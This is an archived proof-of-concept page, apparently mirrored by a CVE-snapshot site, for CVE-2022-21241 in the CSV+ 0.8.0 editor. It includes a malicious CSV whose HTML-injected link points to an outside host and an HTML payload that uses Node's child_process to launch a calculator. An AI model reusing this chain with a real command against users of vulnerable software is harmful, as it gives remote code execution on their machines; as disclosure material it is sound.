Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-21241 PoC — Csv+ 跨站脚本漏洞

Source
Associated Vulnerability
Title:Csv+ 跨站脚本漏洞 (CVE-2022-21241)
Description:Csv+是日本Masaki Enomoto个人开发者的一个全新的 Csv 编辑器。 CSV+ 存在跨站脚本漏洞,该漏洞源于用户提供的数据未充分清理而存在的。 远程攻击者可以诱骗受害者跟踪特制链接,并在用户浏览器中在易受攻击的网站上下文中执行任意 HTML 和脚本代码。公开的漏洞允许远程攻击者执行跨站点脚本 (XSS) 攻击。
Description
👻 [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241)
Readme
# csv-plus_vulnerability
👻 2-Click Arbitrary Code Execution Vulnerability.  

![PoC.gif](files/PoC.gif)  

CVE-2022-21241  

⚠  
**This PoC was created to alert users and investigate vulnerabilities in their own CSV+, and is prohibited to be used for attacks.**

## Vulnerability
The following versions are vulnerable.  
- CSV+ <= 0.8.0  

Attackers can execute arbitrary code by using the Node.js functionality.
They will place the malicious js code on some site and link it from a-tags with the HTML injection vulnerability in CSV+.

## PoC
![scenario.png](files/scenario.png)  
### Malicious csv file
```csv
<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
```
`https://electronooooo.htmlbin.net/xsscalc.html` is a temporary link.  
### Malicious html file (calc)
```html
<!DOCTYPE html>
<html>
    <head>
        <script>
        if (confirm("Do you want to run a calculator to check for vulnerabilities?")){
            var cmd = "calc";
            require("child_process").exec(cmd);
        }
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>
```
File Snapshot

[4.0K] /data/pocs/033843995316e0d3514b259e98696ea52da3fa3e ├── [ 74] Evil.csv ├── [4.0K] files │   ├── [2.7M] PoC.gif │   ├── [1.1M] PoC.mp4 │   └── [ 17K] scenario.png ├── [1.1K] README.md └── [1021] xsscalc.html 1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.